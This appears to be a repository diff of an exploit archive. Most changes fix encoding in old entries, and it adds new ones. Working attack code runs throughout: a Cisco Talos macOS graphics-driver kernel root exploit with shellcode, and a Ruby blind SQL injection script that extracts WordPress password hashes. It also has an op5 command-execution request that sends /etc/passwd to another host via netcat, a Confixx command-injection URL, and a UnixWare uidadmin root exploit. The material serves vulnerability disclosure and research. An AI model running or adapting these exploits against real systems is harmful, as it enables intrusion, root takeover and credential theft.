# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
@ -37,10 +37,10 @@ Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
Line 44: $result = $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id="'.*$result['fm_form_id']*.'";');
[...]
3. Proof of concept
@ -52,19 +52,19 @@ X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and
"a"="a&action=fm_form&fm_form_referer=%2F
4. Explanation
---------------------
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
formulary with fm_form_id="1" and the JSON message received will be simil=
ar
to:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
@ -72,11 +72,11 @@ The second time he tries to do the same with the same email the message
returned will be:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
If we insert *1**" and substr(user(),1,1)="a *we'll receive either the sa=
me
message indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message

544
platforms/osx/local/39675.c Executable file
View file

@ -0,0 +1,544 @@
/*
T A L O S V U L N D E V
Proof-of-Concept Exploit
Advisory: http://www.talosintel.com/reports/TALOS-2016-0088/
Snort rules: 37517, 37518
CVE-2016-1743
Author: Piotr Bania, Cisco Talos
Target: Apple Intel HD 3000 Graphics driver
Impact: Local Privilege Escalation (root)
Tested Configuration:
Apple Intel HD 3000 Graphics driver 10.0.0
Darwin Kernel Version 15.2.0
OSX 10.11.2
Compilation:
gcc TALOS-2016-0088_poc.c lsym.m -o TALOS-2016-0088_poc -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
kudos:
qwertyoruiop (i've grabbed the lsym thing from you)
technical information (AppleIntelHD3000Graphics driver 10.0.0) :
...
__text:000000000001AA4E mov ecx, [rcx]
__text:000000000001AA50 add ecx, ecx
__text:000000000001AA52 sub eax, ecx
__text:000000000001AA54 cmp rbx, rax
__text:000000000001AA57 ja loc_1AC8C
__text:000000000001AA5D mov [rbp+var_54], esi
__text:000000000001AA60 mov rax, [rdi]
__text:000000000001AA63 mov esi, 168h
__text:000000000001AA68 call qword ptr [rax+980h] ; # WE CAN CONTROL THIS #
Expected output:
mac-mini:bug mini$ uname -a
Darwin BLAs-Mac-mini 15.2.0 Darwin Kernel Version 15.2.0: Fri Nov 13 19:56:56 PST 2015; root:xnu-3248.20.55~2/RELEASE_X86_64 x86_64
mac-mini:bug mini$ ./TALOS-2016-0088_poc
----------------------------------------------------------------
APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11
by Piotr Bania / CISCO TALOS
----------------------------------------------------------------
Alloc: deallocating!
Alloc: allocating 0x2000 (0x00000000 - 0x00002000)bytes
Alloc: vm_allocate ok, now vm_protect ...
Alloc: vm_allocate returned = 0 - addr = 0x00000000, vm_protect ok, filling
Mapping the kernel
MapKernel: kernel mapped
Initializing service
InitService: Trying: Gen6Accelerator
InitService: service ok!
Commencing stage 1
Stage1: Copying the stage1 payload 0x00001000 - 0x00001071
Stage1: Setting up the RIP to 0x00001000
Stage1: Copying trigger data
Stage1: Making stage1 call
Stage1: leaked kernel address 0xffffff8021e00000
Stage1: kernel address leaked, success!
ResolveApi: using kernel addr 0xffffff8021e00000 (file base = 0xffffff8000200000)
ResolveApi: _current_proc = 0xffffff8022437a60
ResolveApi: _proc_ucred = 0xffffff80223a9af0
ResolveApi: _posix_cred_get = 0xffffff802237e780
ResolveApi: _chgproccnt = 0xffffff80223a8400
Commencing stage 2
Stage2: preparing the stage2 payload
Stage2: Copying the stage2 payload 0x00001000 - 0x00001071
Stage2: Setting up the RIP to 0x00001000
Stage2: Copying trigger data
Stage2: Making stage2 call
Stage2: success, got root!
Stage2: now executing shell
sh-3.2# whoami
root
sh-3.2#
*/
#include "import.h"
/**
defines
**/
#define MEM_SIZE 0x2000
#define PAYLOAD_MEM_START 0x1000
#define INIT_SIG 0x0210010100000008
#define OFFSET_PAYLOAD_EXEC 0x980
#define OFFSET_ROOM 64
#define RESOLVE_SYMBOL_MY(map, name) lsym_find_symbol(map, name) - base + KernelAddr
/**
stage 1 payload - get kernel address and put it to 0x1000
; memory space for kernel address
nop
nop
nop
nop
nop
nop
nop
nop
save_regs64
; get msr entry
mov rcx, 0C0000082h ; lstar
rdmsr ; MSR[ecx] --> edx:eax
shl rdx, 32
or rax, rdx
; find kernel addr - scan backwards
MAX_KERNEL_SCAN_SIZE equ 10000h
KERNEL_SIG equ 01000007FEEDFACFh
PAGE_SIZE equ 1000h
mov rcx, MAX_KERNEL_SCAN_SIZE
and rax, not 0FFFFFh
xor rdx, rdx
mov r8, KERNEL_SIG
scan_loop:
sub rax, PAGE_SIZE
dec rcx
jz scan_done
; is sig correct?
cmp qword [rax], r8
jnz scan_loop
mov rdx, rax
scan_done:
; store the addr - rdx kernel addr, 0 if not found
lea rcx, [shell_start]
mov qword [rcx], rdx
load_regs64
xor rax, rax
xor r15, r15
ret
**/
unsigned char stage1[113] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55,
0x41, 0x56, 0x41, 0x57, 0x48, 0xB9, 0x82, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x32,
0x48, 0xC1, 0xE2, 0x20, 0x48, 0x09, 0xD0, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x01, 0x00, 0x48, 0x25,
0x00, 0x00, 0xF0, 0xFF, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0xCF, 0xFA, 0xED, 0xFE, 0x07, 0x00, 0x00,
0x01, 0x48, 0x2D, 0x00, 0x10, 0x00, 0x00, 0x48, 0xFF, 0xC9, 0x74, 0x08, 0x4C, 0x39, 0x00, 0x75,
0xF0, 0x48, 0x89, 0xC2, 0x48, 0x8D, 0x0D, 0xA5, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x11, 0x41, 0x5F,
0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF,
0xC3
};
/**
stage 2 payload - escalate
jmp over_api_table
api_current_proc dq 0
api_proc_ucred dq 0
api_posix_cred_get dq 0
api_chgproccnt dq 0
over_api_table:
save_regs64
mov rax, qword [api_current_proc]
call rax
mov rdi, rax ; rdi = cur_proc
; system v abi - rdi first arg
mov rax, qword [api_proc_ucred]
call rax
; rax = cur_ucred
mov rdi, rax
mov rax, qword [api_posix_cred_get]
call rax
; rax = pcred
mov dword [rax], 0
mov dword [rax+8], 0
load_regs64
xor rax, rax
xor r15, r15
ret
**/
#define OFF_API_START 2
#define OFF_API_CURRENT_PROC OFF_API_START
#define OFF_API_PROC_UCRED OFF_API_CURRENT_PROC + 8
#define OFF_API_POSIX_CRED_GET OFF_API_PROC_UCRED + 8
#define OFF_API_CHGPROCCNT OFF_API_POSIX_CRED_GET + 8 // not used in this example
unsigned char stage2[111] = {
0xEB, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B,
0x05, 0xCD, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC9, 0xFF, 0xFF,
0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0xC7,
0x00, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E,
0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, 0xC3
};
/**
globals
**/
uint64_t mem;
io_connect_t conn;
uint64_t KernelAddr = 0;
lsym_map_t* MappingKernel = 0;
uint64_t api_current_proc = 0;
uint64_t api_proc_ucred = 0;
uint64_t api_posix_cred_get = 0;
uint64_t api_chgproccnt = 0;
/**
functions
**/
uint64_t Alloc(uint32_t addr, uint32_t sz)
{
mach_error_t k_error;
printf("Alloc: deallocating! \n");
vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
printf("Alloc: allocating 0x%x (0x%08x - 0x%08x) bytes\n", sz, addr, addr+sz);
k_error = vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_allocate() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate ok, now vm_protect ...\n");
k_error = vm_protect(mach_task_self(), addr, sz, 0, 7); //rwx
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_protect() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate returned = %d - addr = 0x%08x, vm_protect ok, filling\n", k_error, addr);
while(sz--) *(char*)(addr+sz)=0;
return addr;
}
int MapKernel(void)
{
MappingKernel = lsym_map_file("/mach_kernel");
if (!MappingKernel || !MappingKernel->map)
{
MappingKernel = lsym_map_file("/System/Library/Kernels/kernel");
}
if (!MappingKernel || !MappingKernel->map)
{
printf("MapKernel: unable to map kernel, quiting \n");
return -1;
}
printf("MapKernel: kernel mapped \n");
return 1;
}
int ResolveApi(void)
{
uint64_t base = lsym_kernel_base(MappingKernel);
api_current_proc = RESOLVE_SYMBOL_MY(MappingKernel, "_current_proc");
api_proc_ucred = RESOLVE_SYMBOL_MY(MappingKernel, "_proc_ucred");
api_posix_cred_get = RESOLVE_SYMBOL_MY(MappingKernel, "_posix_cred_get");
api_chgproccnt = RESOLVE_SYMBOL_MY(MappingKernel, "_chgproccnt");
printf("ResolveApi: using kernel addr 0x%016llx (file base = 0x%016llx) \n", KernelAddr, base);
printf("ResolveApi: _current_proc = 0x%016llx \n", api_current_proc);
printf("ResolveApi: _proc_ucred = 0x%016llx \n", api_proc_ucred);
printf("ResolveApi: _posix_cred_get = 0x%016llx \n", api_posix_cred_get);
printf("ResolveApi: _chgproccnt = 0x%016llx \n", api_chgproccnt);
return 1;
}
int InitService(char *IoServiceName)
{
int type;
io_service_t service;
CFMutableDictionaryRef matching;
io_iterator_t iterator;
printf("InitService: Trying: %s \n", IoServiceName);
matching = IOServiceMatching(IoServiceName);
if( !matching)
{
printf("Initservice: IOServiceMatching() failed \n");
return -1;
}
if (IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator) != KERN_SUCCESS)
{
printf("InitService: IOServiceGetMatchingServices failed \n");
return -1;
}
service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL)
{
printf("InitService: IOIteratorNext failed \n");
return -1;
}
type = 0;
conn = MACH_PORT_NULL;
if (IOServiceOpen(service, mach_task_self(), 5, &conn) != KERN_SUCCESS)
{
printf("InitService: IOServiceOpen failed! \n");
return -1;
}
printf("InitService: service ok! \n");
return 1;
}
int Stage1(void)
{
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage1: Copying the stage1 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage1, sizeof(stage1));
printf("Stage1: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage1: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage1: Making stage1 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
KernelAddr = *(uint64_t*)PAYLOAD_MEM_START;
printf("Stage1: leaked kernel address 0x%016llx \n", KernelAddr);
if ((KernelAddr == 0) || (KernelAddr == 0x90909090))
{
printf("Stage1: fatal kernel address is wrong, exiting \n");
return -1;
}
printf("Stage1: kernel address leaked, success! \n");
return 1;
}
int Stage2(void)
{
int i;
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage2: preparing the stage2 payload \n");
unsigned char *t = (unsigned char*)&stage2;
*(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc;
*(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred;
*(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get;
*(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt;
printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));
printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage2: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage2: Making stage2 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
setuid(0);
if (getuid() == 0)
{
printf("Stage2: success, got root! \n");
printf("Stage2: now executing shell \n");
system("/bin/sh");
exit(0);
}
printf("Stage2: failed! \n");
return -1;
}
int main(void)
{
printf(" ---------------------------------------------------------------- \n");
printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n");
printf(" by Piotr Bania / CISCO TALOS \n");
printf(" ---------------------------------------------------------------- \n\n\n");
IOServiceClose(0);
IOServiceOpen(0, 0, 0, 0);
// if this fails and we are done
mem = Alloc(0, MEM_SIZE);
printf("Mapping the kernel \n");
if (MapKernel() == -1)
return -1;
printf("Initializing service \n");
if (InitService("Gen6Accelerator") == -1)
return -1;
printf("Commencing stage 1 \n");
if (Stage1() == -1)
return -1;
if (ResolveApi() == -1)
return -1;
printf("Commencing stage 2 \n");
Stage2();
return 1;
}

2
platforms/php/webapps/23798.txt
View file

@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9831/info
The Confixx PERL debugging utility functionality has been reported to be prone to a remote command execution vulnerability. The issue is reported to occur when a command sequence is appended to a HTTP request for a PERL script resource, the command sequence must contain a prefixed ';' semi-colon character. When this request is processed, the command sequence will be reportedly executed with the privileges of the process that invokes the Confixx PERL debugging utility.
; /bin/cat location_of_Confixx_config_file
http://www.example.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd
http://www.example.com/user/tools_cgicheck2.php?dir=&file=%20./x%20|/bin/cat%20/etc/passwd

85
platforms/php/webapps/24868.rb
View file

@ -5,15 +5,14 @@
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc=
h (cli)
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
##############
# Description:
##############
# The "order" and "orderby" parameter is vulnerable for SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din=
ic_faq&orderby=3D<sqli>
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=in=
ic_faq&orderby=<sqli>
# PoC take some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I'm to lazy right now
@ -22,22 +21,22 @@ ic_faq&orderby=3D<sqli>
###################################
#
# function prepare_items() {
# $this->_column_headers =3D array($this->_columns, $this->_hidden_columns=
# $this->_column_headers = array($this->_columns, $this->_hidden_columns=
, $this->_sortable_columns);
# $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC";
# $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby=
# $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC";
# $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby=
']} {$sort_order}" : false;
#
# global $wpdb;
# if (is_array($this->_sql)) {
# if ($orderby_column =3D=3D false) {
# $data =3D $this->_sql;
# if ($orderby_column == false) {
# $data = $this->_sql;
# } else {
# $data =3D $this->_sql;
# $data = $this->_sql;
# usort($data, array(&$this, 'usort_reorder'));
# }
# } else {
# $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A=
# $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A=
);
# }
###########################################################################=
@ -51,47 +50,47 @@ ic_faq&orderby=3D<sqli>
require "net/http"
require "uri"
$target =3D "" # EDIT ME #
$cookie =3D "" # EDIT ME # authenticated user session
$target = "" # EDIT ME #
$cookie = "" # EDIT ME # authenticated user session
# Example:
#$target =3D "http://127.0.0.1:9001/wordpress/"
#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405=
45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se=
ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs=
ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91=
694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=3D1"
#$target = "http://127.0.0.1:9001/wordpress/"
#$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin%7C13640405=
45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor%3Dhtml; wp-se=
ttings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony%40bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http%3A%2F%2Fs=
ucker.de; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=admin%7C1364040545%7Cd7053b96adaa95745023b91=
694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=1"
if $target.eql?("") or $cookie.eql?("")
puts "\n[!]\tPlease set $target and $cookie variable\n"
raise
end
$chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash =3D "$P$"
$i =3D 0 # chars index
$j =3D 4 # hash index
$chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash = "$P$"
$i = 0 # chars index
$j = 4 # hash index
def sqli_send()
sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*=
(SELECT table_name FROM information_schema.tables)END) --")
uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby=
=3D#{sqli}")
http =3D Net::HTTP.new(uri.host, uri.port)
uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby=
=#{sqli}")
http = Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stderr)
request =3D Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
request = Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
rv:19.0) Gecko/20100101 Firefox/19.0"
request["Cookie"] =3D $cookie
resp =3D http.request(request)
if( resp.code !=3D "200" )
puts "something is wrong response =3D #{resp.code}"
request["Cookie"] = $cookie
resp = http.request(request)
if( resp.code != "200" )
puts "something is wrong response = #{resp.code}"
raise
end
# In WordPress default settings there will no SQL error displayed
@ -101,17 +100,17 @@ j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
end
def print_status()
output =3D "HASH: #{$hash} try #{$chars[$i]}"
output = "HASH: #{$hash} try #{$chars[$i]}"
print "\b"*output.length + output
end
while( $hash.length < 34 )
if( !sqli_send() )
$hash +=3D $chars[$i]
$j +=3D 1
$i =3D 0
$hash += $chars[$i]
$j += 1
$i = 0
else
$i +=3D 1
$i += 1
end
print_status()
end

2
platforms/php/webapps/26866.txt
View file

@ -4,7 +4,7 @@ Round Cube will reportedly reveal its installation path in an error message outp
Requesting this link:
http://xxxx.com/roundcube/?_auth=3Dcf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=3Dma%60il
http://xxxx.com/roundcube/?_auth=cf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_task=ma%60il
Caused this error message:

138
platforms/php/webapps/39676.txt Executable file
View file

@ -0,0 +1,138 @@
[+] Credits: hyp3rlinx
[+] Website: http://hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt
Vendor:
============
www.op5.com
Product:
===========
op5 v7.1.9
op5 Monitor is a software product for server, Network monitoring and
management based on the open source Project Nagios.
Vulnerability Type:
========================
Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
op5 has a CSRF entry point that can be used to execute arbitrary remote
commands on op5 system sent via HTTP GET requests, allowing attackers
to completely takeover the affected host, to be victimized a user must be
authenticated and visit a malicious webpage or click an infected link...
Reference:
https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/
Exploit code(s):
===============
trivial RCE cat /etc/passwd... using netcat
nc.exe -vvlp 5555 > passwds.txt
https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%205555
<https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20%7C%20nc%20192.168.1.102%205555>
result:
listening on [any] 5555 ...
192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT
sent 0, rcvd 1343
C:\netcat-win32-1.12>type passwds.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smstools:x:499:499::/var/lib/smstools:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
op5lsu:x:500:500::/home/op5lsu:/bin/bash
saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
monitor:x:299:48::/opt/monitor:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
Disclosure Timeline:
============================================
Vendor Notification: March 27, 2016
Vendor confirms vulnerability March 27, 2016
Vendor issue patched new release v7.2.0 April 5, 2016
April 6, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=================================================================
Request Method(s): [+] GET
Vulnerable Product: [+] op5 v7.1.9
Vulnerable Parameter(s): [+] 'cmd_str'
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx

42
platforms/sco/local/19654.pl
View file

@ -33,21 +33,21 @@ ed
#
###########################################################
$ui_source =3D "/home/xnec/ui.c";
$ui_dest =3D "/home/xnec/ui";
$ui_code =3D "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc =3D "/etc/security/tcb/privs";
$uidatafile=3D"/tmp/uidata";
$sumpath =3D "/usr/bin/sum";
$uidata_sym =3D "/tmp/uidata.tmp";
$compiler =3D "cc";
$uidadmin =3D "/usr/bin/uidadmin";
$ui_source = "/home/xnec/ui.c";
$ui_dest = "/home/xnec/ui";
$ui_code = "void main() { setreuid(0,0); system(\"/bin/ksh\");}";
$privloc = "/etc/security/tcb/privs";
$uidatafile="/tmp/uidata";
$sumpath = "/usr/bin/sum";
$uidata_sym = "/tmp/uidata.tmp";
$compiler = "cc";
$uidadmin = "/usr/bin/uidadmin";
###
# Path to the directory where your $uidata_sym will exist relative to
# /etc/uidata/
###
$uidadminarg =3D "../../tmp";
$uidadminarg = "../../tmp";
print("\n* uidadmin exploit for UnixWare 7.1 <btellier\@usa.net>\n\n");
@ -69,20 +69,20 @@ if ( -e $ui_dest ) {
# stat $ui_dest for size in bytes and ctime (seconds since epoch)
###
$size=3D(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=3D(stat($ui_dest))[10];
print("$ui_dest size=3D$size ctime=3D$ctime\n");
$size=(stat($ui_dest))[7] || die "cannot stat $ui_dest";
$ctime=(stat($ui_dest))[10];
print("$ui_dest size=$size ctime=$ctime\n");
###
# get the checksum value for $ui_dest
###
open(SUM, "$sumpath -r $ui_dest|");
$checksum=3D<SUM>;
$checksum=<SUM>;
chomp($checksum);
@sumfields=3Dsplit(' ', $checksum);
$chksum =3D @sumfields[0];
$chksum =3D~ s/^0//;
@sumfields=split(' ', $checksum);
$chksum = @sumfields[0];
$chksum =~ s/^0//;
print("$ui_dest checksum is $chksum\n");
@ -90,7 +90,7 @@ print("$ui_dest checksum is $chksum\n");
# Put our entry into $uidatafile, use trailing newline
###
$uidata=3D"$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
$uidata="$size:$chksum:$ctime:\%fixed,allprivs:$ui_dest";
print("placing '$uidata' into $uidatafile\n");
open(TMP, ">$uidatafile");
print(TMP "$uidata\n");
@ -113,9 +113,9 @@ c
###
open (PRIV, "$privloc");
@privs =3D <PRIV>;
@privs = <PRIV>;
foreach $priv (@privs) {
if ($priv =3D~ /$ui_dest/) {
if ($priv =~ /$ui_dest/) {
print("Exploit successful. Run $ui_dest after reboot for rootshell
\n");
exit(0);
@ -130,7 +130,7 @@ print("Exploit not successful, sorry!\n");
